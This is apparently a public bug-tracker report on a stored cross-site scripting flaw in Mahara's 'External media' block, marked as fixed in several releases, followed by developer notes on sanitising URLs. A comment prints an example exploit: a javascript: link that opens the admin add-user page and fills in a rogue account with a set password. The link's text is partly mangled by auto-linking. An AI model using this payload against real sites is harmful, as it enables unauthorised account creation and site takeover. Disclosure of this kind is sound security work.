XSS exploit in 'External media' block
Bug #1968920 reported by
Kristina Hoeppner
This bug affects 1 person
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Mahara |
Fix Released
|
High
|
Gold | ||
20.10 |
Fix Released
|
High
|
Unassigned | ||
21.04 |
Fix Released
|
High
|
Unassigned | ||
21.10 |
Fix Released
|
High
|
Unassigned | ||
22.04 |
Fix Released
|
High
|
Gold |
Bug Description
When you put the following into the 'External media' block, you get an alert pop-up window.
<a class="
In contrast to text blocks where the 'javascript:alert' is stripped out, this is not the case in 'External media'.
It wasn't a problem when the class wasn't present, but with the class, a pop-up with the current domain is displayed.
CVE References
description: | updated |
Changed in mahara: | |
status: | New → Confirmed |
importance: | Undecided → High |
no longer affects: | mahara/20.10 |
no longer affects: | mahara/22.10 |
information type: | Private Security → Public Security |
To post a comment you must log in.
Example exploit:
<a class=" embedly- card" href="javascript: {var TestFenster = http:// window. open('. ./admin/ users/add. php','TestWindo w','width= 800,height= 800,left= 100,top= 50');function fill() {TestWindow. adduser. username. value=' badboy' ;TestWindow. adduser. firstname. value=' Bad';TestWindow .adduser. lastname. value=' Boy';http://<email address hidden> ';TestWindow. adduser. password. value=' Secret+ 12345';https:/ /t.co/f2YTjI3B9 B();}TestWindow. addEventListene r('load' ,fill); }">open the gate</a>
Note: I'm not sure about the 't.co' URL as that might have been converted from Twitter as it was sent via a DM.
------- ------- -------
Things to keep in mind:
- we'd probably need to allow protocol free urls too, eg allow strings starting with 'http:// ', 'https:/ /', and '://' blocktype/ externalvideo/ embed_services/ embedly/ embedservice. php#L61
- sanitize the URL
- Alternatively, the sanity check could be done here:
/htdocs/